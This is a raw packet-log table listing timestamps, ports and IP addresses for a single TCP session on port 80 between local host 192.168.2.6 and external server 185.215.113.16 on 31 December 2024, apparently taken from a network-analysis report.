Dec 31, 2024 09:48:41.856136084 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.856168032 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.856173038 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.856199026 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.856235981 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.902844906 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.917929888 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.976181030 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.976208925 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.976222038 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.976233006 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.976259947 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.976314068 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.976560116 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.976571083 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.976581097 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.976600885 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.976633072 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.976644039 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.976655006 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.976672888 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.976675034 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.976684093 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.976694107 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.976701021 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.976710081 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.976720095 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.976722956 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.976730108 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.976741076 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.976753950 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.976771116 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.976815939 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.976826906 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.976835966 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.976846933 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.976857901 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.976867914 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.976877928 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.976881981 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.976887941 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.977013111 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.977022886 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.977041960 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.977047920 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.977051973 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.977061987 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.977068901 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.977072954 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.977099895 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.977125883 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.977168083 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.977298021 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.977308035 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.977328062 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.977339029 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.977340937 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.977349043 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.977370024 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.977379084 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.977390051 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.977400064 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.977415085 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.977430105 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.977452040 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.977459908 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.977467060 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.977475882 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.977482080 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.977485895 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.977499008 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.977503061 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.977514029 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.977524996 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.977535009 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.977546930 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.977550983 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.977572918 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.977588892 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.977725029 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.977788925 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.977799892 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.977804899 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.977838039 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.977848053 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.977864981 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.977874994 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.977885008 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.977895975 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.977905035 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.977930069 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.978142977 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.978177071 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.978212118 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.978220940 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.978231907 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.978243113 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.978254080 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.978272915 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.978312016 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.979492903 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.979504108 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.979515076 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.979523897 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.979546070 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.979574919 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.979582071 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.979590893 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.979599953 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.979609966 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.979619980 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.979624987 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.979645014 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.979804039 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.979814053 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.979829073 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.979839087 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.979849100 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.979860067 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.979866028 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.979882956 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.979892015 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.979892969 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.979902983 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.979913950 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.979924917 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.979952097 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.979979038 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.979989052 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.980000019 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.980010033 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.980019093 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.980029106 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.980040073 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.980051994 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.980062008 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.980071068 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.980082989 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.980086088 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.980108976 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.980118036 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.980128050 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.980140924 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.980151892 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.980159998 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.980175018 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.980185032 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.980185032 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.980230093 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.980248928 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.980259895 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.980273962 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.980283976 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.980292082 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.980325937 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.980335951 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.980346918 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.980355978 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.980385065 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.980392933 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.980395079 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.980403900 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.980412960 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.980415106 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.980424881 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.980438948 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.980448961 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.980457067 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.980485916 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.980487108 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.980487108 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:41.980494976 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:41.980536938 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.101541996 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.101577997 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.101588011 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.101598024 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.101608992 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.101617098 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.101619005 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.101646900 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.101659060 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.101669073 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.101680040 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.101680994 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.101690054 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.101711035 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.101728916 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.101763010 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.101788044 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.101797104 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.101818085 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.101819992 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.101829052 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.101844072 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.101854086 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.101857901 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.101866007 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.101876020 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.101906061 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.101991892 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.102039099 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.102049112 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.102078915 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.102078915 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.102088928 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.102125883 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.102233887 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.102268934 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.102278948 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.102320910 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.102330923 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.102335930 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.102341890 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.102360010 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.102390051 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.102404118 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.102416039 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.102427006 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.102427006 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.102442026 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.102488041 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.102497101 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.102507114 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.102519035 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.102524042 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.102530003 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.102538109 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.102543116 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.102549076 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.102570057 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.102590084 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.102611065 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.102619886 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.102632999 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.102670908 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.102719069 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.102729082 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.102739096 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.102747917 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.102757931 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.102761984 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.102776051 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.102802038 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.102941990 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.102988958 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.102999926 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.103027105 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.103060961 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.103070021 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.103080034 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.103090048 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.103096008 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.103099108 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.103118896 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.103131056 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.103142023 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.103144884 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.103152037 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.103163004 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.103178978 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.103200912 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.104475975 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.104486942 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.104496956 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.104506969 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.104521990 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.104547024 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.104552984 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.104574919 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.104614019 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.104650021 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.104660034 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.104675055 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.104684114 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.104697943 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.104732990 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.105108976 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.105130911 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.105142117 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.105150938 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.105161905 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.105176926 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.105195045 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.105195999 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.105206013 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.105216026 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.105235100 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.105247021 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.105484009 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.105494976 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.105504036 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.105528116 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.105551958 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.105587959 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.105597019 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.105628014 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.105628014 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.105637074 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.105639935 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.105658054 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.105669022 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.105676889 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.105679989 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.105700016 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.106111050 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.106122017 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.106137991 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.106149912 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.106159925 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.106184006 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.106189966 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.106200933 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.106210947 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.106230021 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.106245995 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.106259108 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.106268883 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.106280088 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.106290102 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.106302023 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.106336117 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.106489897 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.106502056 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.106512070 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.106522083 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.106530905 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.106554031 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.106590033 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.106601000 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.106611013 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.106621027 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.106628895 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.106647015 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.117240906 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.226808071 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.226830006 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.226841927 CET	80	49754	185.215.113.16	192.168.2.6
Dec 31, 2024 09:48:42.226882935 CET	49754	80	192.168.2.6	185.215.113.16
Dec 31, 2024 09:48:42.226931095 CET	80	49754	185.215.113.16	192.168.2.6
